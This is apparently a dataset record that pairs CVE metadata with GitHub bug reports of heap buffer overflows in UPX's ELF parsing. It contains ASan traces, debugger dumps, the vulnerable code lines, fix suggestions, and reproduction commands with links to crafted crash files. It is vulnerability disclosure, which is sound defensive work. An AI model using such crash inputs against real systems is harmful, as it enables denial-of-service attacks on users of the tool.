#6 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4800
#7 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4817
#8 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4828
#9 0x4f337a in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
#10 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
#11 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
#12 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
#13 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
#14 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
#15 0x7efc08e6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#16 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)
0x61d00001f3b1 is located 189 bytes to the right of 2164-byte region [0x61d00001ea80,0x61d00001f2f4)
allocated by thread T0 here:
#0 0x7efc09a55602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/bele.h:164 get_le32(void const*)
Shadow bytes around the buggy address:
0x0c3a7fffbe20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fffbe30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fffbe40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fffbe50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
0x0c3a7fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c3a7fffbe70: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
0x0c3a7fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fffbea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fffbeb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fffbec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==112024==ABORTING
```
Debug
```bash
Program received signal SIGSEGV, Segmentation fault.
0x000000000066f8f8 in get_le32 (p=0xa1fffd) at bele.h:164
164 return ACC_UA_GET_LE32(p);
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0xa7ce93
$rcx : 0x2
$rdx : 0xae
$rsp : 0x00007fffffffcc18 → 0x000000000051249b → <PackLinuxElf32::elf_lookup(char+0> xor eax, ebp
$rbp : 0x8e8223e2
$rsi : 0x0000000000a1fffd → 0x0000000000a1fffd
$rdi : 0x00000000009ed3c0 → 0x00000000007cd9c0 → 0x000000000066fe00 → <N_BELE_RTP::LEPolicy::~LEPolicy()+0> lea rsp, [rsp-0x98]
$rip : 0x000000000066f8f8 → <N_BELE_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR [rsi]
$r8 : 0x1f
$r9 : 0x3fdf
$r10 : 0xae
$r11 : 0x1d9577c0
$r12 : 0x0000000000a00030 → 0x00000000007267a0 → <vtable+0> add BYTE PTR [rax], al
$r13 : 0x0000000000a1fffd → 0x0000000000a1fffd
$r14 : 0x0000000000a00a51 → 0x0000000000000000
$r15 : 0x00000000007cd9c0 → 0x000000000066fe00 → <N_BELE_RTP::LEPolicy::~LEPolicy()+0> lea rsp, [rsp-0x98]
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc18│+0x0000: 0x000000000051249b → <PackLinuxElf32::elf_lookup(char+0> xor eax, ebp ← $rsp
0x00007fffffffcc20│+0x0008: 0x00000000006cdffe → "JNI_OnLoad"
0x00007fffffffcc28│+0x0010: 0x0000000200000000
0x00007fffffffcc30│+0x0018: 0x000000000900457f
0x00007fffffffcc38│+0x0020: 0x0000000000000068 ("h"?)
0x00007fffffffcc40│+0x0028: 0x0000000000000000
0x00007fffffffcc48│+0x0030: 0x0000000000070000
0x00007fffffffcc50│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x66f8e7 <N_BELE_RTP::LEPolicy::get32(void+0> mov rcx, QWORD PTR [rsp+0x8]
0x66f8ec <N_BELE_RTP::LEPolicy::get32(void+0> mov rdx, QWORD PTR [rsp]
0x66f8f0 <N_BELE_RTP::LEPolicy::get32(void+0> lea rsp, [rsp+0x98]
→ 0x66f8f8 <N_BELE_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR [rsi]
0x66f8fa <N_BELE_RTP::LEPolicy::get32(void+0> ret
0x66f8fb nop DWORD PTR [rax+rax*1+0x0]
0x66f900 <N_BELE_RTP::LEPolicy::get64(void+0> lea rsp, [rsp-0x98]
0x66f908 <N_BELE_RTP::LEPolicy::get64(void+0> mov QWORD PTR [rsp], rdx
0x66f90c <N_BELE_RTP::LEPolicy::get64(void+0> mov QWORD PTR [rsp+0x8], rcx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:bele.h+164 ────
159 }
160
161 inline unsigned get_le32(const void *p)
162 {
163 #if defined(ACC_UA_GET_LE32)
→ 164 return ACC_UA_GET_LE32(p);
165 #else
166 return acc_ua_get_le32(p);
167 #endif
168 }
169
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x66f8f8 → get_le32(p=0xa1fffd)
[#1] 0x66f8f8 → N_BELE_RTP::LEPolicy::get32(this=0x9ed3c0 <N_BELE_RTP::le_policy>, p=0xa1fffd)
[#2] 0x51249b → Packer::get_te32(this=0xa00030, p=0xa1fffd)
[#3] 0x51249b → PackLinuxElf32::elf_lookup(this=0xa00030, name=0x6cdffe "JNI_OnLoad")
[#4] 0x529509 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce10)
[#5] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce10, this=0xa00030)
[#6] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce10, this=0xa00030)
[#7] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce10, this=0xa00030)
[#8] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce10)
[#9] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ bt
#0 0x000000000066f8f8 in get_le32 (p=0xa1fffd) at bele.h:164
#1 N_BELE_RTP::LEPolicy::get32 (this=0x9ed3c0 <N_BELE_RTP::le_policy>, p=0xa1fffd) at bele_policy.h:192
#2 0x000000000051249b in Packer::get_te32 (this=0xa00030, p=0xa1fffd) at packer.h:296
#3 PackLinuxElf32::elf_lookup (this=0xa00030, name=0x6cdffe "JNI_OnLoad") at p_lx_elf.cpp:5382
#4 0x0000000000529509 in PackLinuxElf32::PackLinuxElf32help1 (this=this@entry=0xa00030, f=f@entry=0x7fffffffce10) at p_lx_elf.cpp:315
#5 0x000000000052c65e in PackLinuxElf32Le::PackLinuxElf32Le (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.h:395
#6 PackLinuxElf32x86::PackLinuxElf32x86 (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.cpp:4800
#7 PackBSDElf32x86::PackBSDElf32x86 (f=0x7fffffffce10, this=0xa00030) at p_lx_elf.cpp:4817
#8 PackFreeBSDElf32x86::PackFreeBSDElf32x86 (this=0xa00030, f=0x7fffffffce10) at p_lx_elf.cpp:4828
#9 0x000000000060448c in PackMaster::visitAllPackers (func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) at packmast.cpp:190
#10 0x00000000006072ca in PackMaster::getUnpacker (f=<optimized out>) at packmast.cpp:248
#11 PackMaster::unpack (this=0x7fffffffcfb0, fo=0x7fffffffcee0) at packmast.cpp:266
#12 0x0000000000670dc5 in do_one_file (iname=iname@entry=0x7fffffffdf15 "id:000089,sig:11,src:001286,op:MOpt-core-havoc,rep:2", oname=oname@entry=0x7fffffffd550 "/dev/null") at work.cpp:160
#13 0x000000000067157c in do_files (i=i@entry=0x4, argc=0x5, argv=0x7fffffffdac8) at work.cpp:271
#14 0x00000000004056a1 in main (argc=0x5, argv=0x7fffffffdac8) at main.cpp:1538
```
Deferencing a generic poniter 'p' trigger the overflow.
```cpp
gef➤ p *p
Attempt to dereference a generic pointer.
gef➤ p p
$1 = (const void *) 0xa1fffd
```
Essentially, the problem is caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382
```cpp
do if (0==((h ^ get_te32(hp))>>1)) {
unsigned st_name = get_te32(&dsp->st_name);
char const *const p = get_str_name(st_name, (unsigned)-1);
if (0==strcmp(name, p)) {
return dsp;
}
} while (++dsp, 0==(1u& get_te32(hp++)));
```
Several locations will also trigger vulnerabilities:
PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5368
```cpp
unsigned const w = get_te32(&bitmask[(n_bitmask -1) & (h>>5)]);
```
PackLinuxElf64::elf_lookup() at p_lx_elf.cpp:5404
```cpp
for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si]))
```
PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5349
```cpp
for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si])) {
char const *const p= get_dynsym_name(si, (unsigned)-1);
if (0==strcmp(name, p)) {
return &dynsym[si];
}
}
```
## What should have happened?
Decompress a crafted/suspicious file.
## Do you have an idea for a solution?
We are very grateful to @jreiser for patching the bucket in p_lx_elf.cpp in the [issue 365](https://github.com/upx/upx/issues/365). However, in fact, all places involving get_te32 () should be strengthened in upx, especially in p_lx_elf.cpp. The four positions we reported should be patched at least:
1) p_lx_elf.cpp:5382
2) p_lx_elf.cpp:5368
3) p_lx_elf.cpp:5404
4) p_lx_elf.cpp:5349
## How can we reproduce the issue?
1. compile upx with address-sanitize
2. execute cmd
```bash
upx.out -df $PoC -o /dev/null
```
p_lx_elf.cpp:5382
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5382) can be found here.
p_lx_elf.cpp:5368
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5368) can be found here.
p_lx_elf.cpp:5404
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__elf_lookup5404) can be found here.
p_lx_elf.cpp:5349
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32__elf_lookup5349) can be found here.
## Please tell us details about your environment.
* UPX version used (`upx --version`):
```bash
upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43
```
* Host Operating System and version:
Ubuntu 16.04 64-bit
* Host CPU architecture:
Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
* Target Operating System and version:
same as Host
* Target CPU architecture:
same as Host | [bug] multi heap buffer overflows in get_le32() | https://api.github.com/repos/upx/upx/issues/380/comments | 2 | 2020-05-23T14:24:07Z | 2023-04-17T18:03:04Z | https://github.com/upx/upx/issues/380 | 623,670,883 | 380 |
CVE-2021-43312 | 2023-03-24T20:15:08.270 | A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/379"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/379 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239.
ASAN reports:
```bash
==110294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000f760 at pc 0x000000466f38 bp 0x7ffcebb0b6a0 sp 0x7ffcebb0b690
READ of size 4 at 0x63000000f760 thread T0
#0 0x466f37 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5239
#1 0x46f660 in PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5127
#2 0x46f660 in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:795
#3 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:407
#4 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1008
#5 0x4f34b2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194
#6 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
#7 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
#8 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
#9 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
#10 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
#11 0x7f8a7e1c882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#12 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)
0x63000000f760 is located 0 bytes to the right of 62304-byte region [0x630000000400,0x63000000f760)
allocated by thread T0 here:
#0 0x7f8a7edbc602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5239 PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)
Shadow bytes around the buggy address:
0x0c607fff9e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c607fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c607fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa
0x0c607fff9ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fff9f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fff9f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c607fff9f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==110294==ABORTING
```
Then analysis the reasons for segv by debugging:
```bash
Program received signal SIGSEGV, Segmentation fault.
0x000000000053b1a8 in PackLinuxElf64::invert_pt_dynamic (this=this@entry=0xa00030, dynp=<optimized out>) at p_lx_elf.cpp:5239
5239 if (buckets[j]) {
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x0000000000a00030 → 0x0000000000726a30 → <vtable+0> add BYTE PTR [rax], al
$rcx : 0x180
$rdx : 0xc00
$rsp : 0x00007fffffffcbf0 → 0x000000000065fa86 → <mem_size(unsigned+0> mov rax, QWORD PTR [rsp+0x10]
$rbp : 0xffffffff
$rsi : 0x7aa9
$rdi : 0x0000000000a01548 → 0x480000104fe81024
$rip : 0x000000000053b1a8 → <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov eax, DWORD PTR [rdi+rsi*4+0x14]
$r8 : 0x12
$r9 : 0xffe0
$r10 : 0xc10
$r11 : 0x7
$r12 : 0x8
$r13 : 0x180
$r14 : 0x0000000000a0f4d8 → 0x000000000000000d
$r15 : 0x0
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcbf0│+0x0000: 0x000000000065fa86 → <mem_size(unsigned+0> mov rax, QWORD PTR [rsp+0x10] ← $rsp
0x00007fffffffcbf8│+0x0008: 0x0000000000400298 → add eax, DWORD PTR [rax]
0x00007fffffffcc00│+0x0010: 0x000000000000ffe0
0x00007fffffffcc08│+0x0018: 0x000000000000f360
0x00007fffffffcc10│+0x0020: 0x00007ffff7352260 → <read+16> cmp rax, 0xfffffffffffff001
0x00007fffffffcc18│+0x0028: 0x000000000000f360
0x00007fffffffcc20│+0x0030: 0x00007ffff7362447 → <lseek64+7> cmp rax, 0xfffffffffffff001
0x00007fffffffcc28│+0x0038: 0x0000000000539692 → <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR [rsp+0x10]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x53b197 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rcx, QWORD PTR [rsp+0x8]
0x53b19c <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rdx, QWORD PTR [rsp]
0x53b1a0 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp+0x98]
→ 0x53b1a8 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov eax, DWORD PTR [rdi+rsi*4+0x14]
0x53b1ac <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> test eax, eax
0x53b1ae <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> je 0x53b235 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> > const*)+7109>
0x53b1b4 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp-0x98]
0x53b1bc <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp], rdx
0x53b1c0 <PackLinuxElf64::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp+0x8], rcx
───────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:p_lx_elf.cpp+5239 ────
5234 unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr;
5235 //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except:
5236 // Rust and Android trim unused zeroes from high end of hasharr[]
5237 unsigned bmax = 0;
5238 for (unsigned j= 0; j < n_bucket; ++j) {
→ 5239 if (buckets[j]) {
5240 if (buckets[j] < symbias) {
5241 char msg[50]; snprintf(msg, sizeof(msg),
5242 "bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n",
5243 buckets[j], symbias);
5244 throwCantPack(msg);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x53b1a8 → PackLinuxElf64::invert_pt_dynamic(this=0xa00030, dynp=<optimized out>)
[#1] 0x53d654 → PackLinuxElf64::invert_pt_dynamic(dynp=<optimized out>, this=0xa00030)
[#2] 0x53d654 → PackLinuxElf64::PackLinuxElf64help1(this=0xa00030, f=0x7fffffffce10)
[#3] 0x53f186 → PackLinuxElf64Le::PackLinuxElf64Le(f=0x7fffffffce10, this=0xa00030)
[#4] 0x53f186 → PackLinuxElf64amd::PackLinuxElf64amd(this=0xa00030, f=0x7fffffffce10)
[#5] 0x6048ac → PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10)
[#6] 0x6072ca → PackMaster::getUnpacker(f=<optimized out>)
[#7] 0x6072ca → PackMaster::unpack(this=0x7fffffffcfb0, fo=0x7fffffffcee0)
[#8] 0x670dc5 → do_one_file(iname=0x7fffffffdf12 "id:000036,sig:11,src:000541+000827,op:MOpt-splice,rep:2", oname=0x7fffffffd550 "/dev/null")
[#9] 0x67157c → do_files(i=0x4, argc=0x5, argv=0x7fffffffdac8)
```
The instruction to crash is, corresponds to the bucket [j] in the source code
```bash
mov eax, DWORD PTR [rdi+rsi*4+0x14]
```
The register rdi and rsi are:
```bash
$rsi : 0x7aa9
$rdi : 0x0000000000a01548
```
The DWORD PTR pointer to 0xa20000, where is a invalid address.
```bash
gef➤ x /10xg 0xa20000
0xa20000: Cannot access memory at address 0xa20000
```
## What should have happened?
Decompress a crafted/suspicious file.
## Do you have an idea for a solution?
A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited.
```cpp
upx_uint64_t const *const bitmask = (upx_uint64_t const *)(void const *)&gashtab[4];
unsigned const *const buckets = (unsigned const *)&bitmask[n_bitmask];
unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr;
//unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except:
// Rust and Android trim unused zeroes from high end of hasharr[]
unsigned bmax = 0;
for (unsigned j= 0; j < n_bucket; ++j) {
if (buckets[j]) {
if (buckets[j] < symbias) {
char msg[50]; snprintf(msg, sizeof(msg),
"bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n",
buckets[j], symbias);
throwCantPack(msg);
}
if (bmax < buckets[j]) {
bmax = buckets[j];
}
}
}
```
## How can we reproduce the issue?
1. compile upx with address-sanitize
2. execute cmd
```bash
upx.out -df $PoC -o /dev/null
```
[Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__invert_pt_dynamic) can be found here.
## Please tell us details about your environment.
* UPX version used (`upx --version`):
```bash
upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43
```
* Host Operating System and version:
Ubuntu 16.04 64-bit
* Host CPU architecture:
Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
* Target Operating System and version:
same as Host
* Target CPU architecture:
same as Host | [bug] heap buffer overflow in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239 | https://api.github.com/repos/upx/upx/issues/379/comments | 2 | 2020-05-23T14:21:20Z | 2023-04-17T18:13:35Z | https://github.com/upx/upx/issues/379 | 623,670,397 | 379 |
CVE-2021-43313 | 2023-03-24T20:15:08.317 | A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/upx/upx/issues/378"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA",
"versionEndExcluding": "4.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/378 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"upx",
"upx"
] | ## What's the problem (or question)?
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688.
ASAN reports:
```bash
==110358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000fed9 at pc 0x00000045acc8 bp 0x7ffd88c9b020 sp 0x7ffd88c9b010
READ of size 4 at 0x61600000fed9 thread T0
#0 0x45acc7 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1688
#1 0x463ba5 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1583
#2 0x463ba5 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:305
#3 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:395
